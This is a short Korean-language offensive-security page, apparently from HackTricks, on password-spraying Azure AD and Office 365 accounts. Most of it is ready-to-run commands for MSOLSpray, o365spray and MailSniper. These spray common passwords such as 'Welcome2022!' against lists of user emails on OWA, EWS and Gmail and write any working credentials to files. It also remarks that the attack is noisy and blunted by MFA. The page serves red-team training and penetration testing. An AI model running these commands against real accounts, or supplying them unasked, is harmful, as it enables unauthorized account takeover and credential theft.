Az - Password Spraying

htARTE (HackTricks AWS Red Team Expert)를 통해 제로에서 영웅이 되는 AWS 해킹을 배워보세요!

HackTricks를 지원하는 다른 방법:

패스워드 스프레이

Azure에서는 Azure AD Graph, Microsoft Graph, Office 365 Reporting 웹 서비스 등과 같은 다양한 API 엔드포인트를 대상으로 이 작업을 수행할 수 있습니다.

그러나 이 기술은 매우 시끄러울 수 있으며 블루 팀이 쉽게 감지할 수 있습니다. 게다가 강제 패스워드 복잡성MFA의 사용으로 인해 이 기술은 거의 쓸모없을 수 있습니다.

MSOLSpray를 사용하여 패스워드 스프레이 공격을 수행할 수 있습니다.

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

또는 o365spray를 사용하여

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

또는 MailSniper를 사용하여

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

最終更新